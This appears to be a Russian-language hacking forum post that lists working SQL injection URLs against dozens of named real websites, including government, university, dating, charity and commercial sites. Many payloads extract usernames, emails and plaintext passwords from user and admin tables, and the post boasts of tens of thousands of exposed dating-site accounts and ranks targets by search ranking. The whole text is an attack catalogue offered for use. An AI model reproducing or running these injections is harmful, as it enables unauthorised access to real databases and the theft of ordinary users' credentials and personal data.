SQL Инъекции

Code:

http://www.bouldermicrofinance.org/_fra/index.php?page=f_curso&cnum=-26+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8,9,10,11--&len=FR

Username: [email protected]
Version: 5.1.39-log
Database: profesores

Google PR: 5

 

Code:

http://www.chartstats.com/release.php?release=-7259+union+select+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29--

Username: [email protected]
Version: 5.1.53-log
Database: chartstats

Google PR: 3

 

Для любителей клубнички

http://altomrc.dk/index.asp?list=category&page=2&cat_id=-302+and+1=0+union+all+select+1,concat_ws%280x3a,password,email,username%29,3,4+from+sexdating_no.sexdating_users+limit+0,1+--+

ИЗ этой СУБДшки можно вытянуть данные пользователей sexdating.de, sexdating.no, sexdating.su, а также еще кучи доменов

В приведенном инъекте более 42 000 юзеров. В целом юзеров под лям. Все пароли - в открытом виде.

 

Government
http://www.plani[G00GLE]ficacion.catamarc[G00GLE]a.gov.ar/zomplog3.9/vernota.php?cod=-15+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,version(),12,13,14,15,16

 

КИНОМАНИЯ.РУ, тИЦ - 1400

Code:

http://www.kinomania.ru/confirm/?id=-1%20OR%20%28SELECT%20COUNT%28*%29%20FROM%20%28SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203%29x%20GROUP%20BY%20CONCAT%28MID%28Password,%201,%2063%29,%20FLOOR%28RAND%280%29*2%29%29%29+--+&code=15541515

++++++++++++++++++++++
kinomaniaru,
u5012_123,
u5012_dump,
u5012_for,u1'
kinomaniaru1
++++++++++++++++++++++
[email protected]
5.0.90-log1

 

Code:

http://wintech.org/bookdetails.php?bookid=-1+union+select+1,concat%28nickname,0x3a,pass%29,3,4,5,6,7+from+tbl_user%20--

хз где админка...
5 ветка

Code:

http://www.service-js.jp/cms/show_news.php?id=-1+union+select+1,concat%28admin_user_name,0x3a,admin_user_pw%29,3,4+from+positive_admin_user+LIMIT+1,1--

 

http://www.ultimatecarpage.com/show.php?num=-577+union+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables+--
Тиц: 40
Пр: 5

http://www.hccw.com/displayAttorney.php?num=-8+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--
pr: 2

http://www.domtomfr.com/commentaire.php?id=-1396+union+select+1,2,@@version,4,5+--
tiz: 10
pr: 4

 

http://www.ecss.bb/viewproduct.php?pid=9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,@@version,15,16,17,18+--

http://frigonoor.com/viewproduct.php?pid=-25+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10+from+information_schema.tables+--

 

http://www.thebitored.com/wordpress/wp-content/plugins/wp-forum/sendmail.php?action=quote&id=1%20union%20select%20version(),2,3%20--%20

 

http://www.microwebnow.com/portfolio/hi-caliberhealth/content.php?pageid=-1+union+select+group_concat(0x3a3a,u_name,0x3a,u_pwd)+from+tbl_users+--
шопчик
http://www.microwebnow.com/portfolio/hi-caliberhealth/content.php?pageid=-1+union+select+group_concat(0x3a3a,user,0x3a,pwd)+from+tbl_admin+--


http://www.bible-history.com/subcat.php?id=13+union+select+group_concat(0x3a3a,admin_username,0x3a,admin_password)+from+administrators+--
cy:40
pr:6

 

http://www.homelessuk.org/details.asp?id=UK5666'+and+1=0+or+1=(select+top+1+name+from+sysusers)+--+

 

http://www.cwmgalleries.biz/cwm_artist_bio.php?artist_id=-10113%20union%20select%20concat_ws(0x3a,host,user,password)%20from%20user--

 

Code:

http://www.tornworld.net/forgotpassword.php

Method Post :

Code:

+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

user : '_!@4dilemma:0'

 

sportbox.ru (офф сайт телеканала роисся 2)
Тиц - 3600
PR - 6​

Code:

http://sportbox.ru/rfpl/?archive=77+and+1=(select+version()||current_user)::int--

 

http://homeidei.ru/index.php?link=6&id=-57%20and%201=2%20union%20select%20concat_ws(char(58),@@version,user(),database(),@@version_compile_os),2,3,4,5,6,7,8,9,10+--
директория /temp/ лежала в открытом виде и доступна для записи, админу отписанно, бага устранена а инъекция осталась)))

 

http://www.isrm.co.uk/jobs/job_details.php?job_id=-511%20union%20select%201,2,3,4,5,6,7,8--

 

http://www.floramarket.kiev.ua/price.php?id=-224+union+select+1,2,3,4,5,6,group_concat(table_name),8,9+from+information_schema.tables+--

http://www.greenroofs.com/projects/pview.php?id=-476+union+select+1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--

 

http://users.unimi.it/discanti/personale/scheda.php?id_utente=-106 and 1=0 union all select 1,2,3,concat_ws(0x3a,password,username,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from db_discanti.utenti limit 0,1 --

Google PR: 8

admin2019:admin:

Всего 82 юзера. Пароли в открытом виде.

 

http://www.radiococa.com/noticias.php?id=373 and 1=0 union all select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8 --

Google PR: 2

4.1.18-nt:arundanet_radiococa:usercoca@localhost

 

http://www.facom-tools.co.uk/product_detail.php?id=1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8+--+
nt:facom_2008:facom_db@localhost
PR 4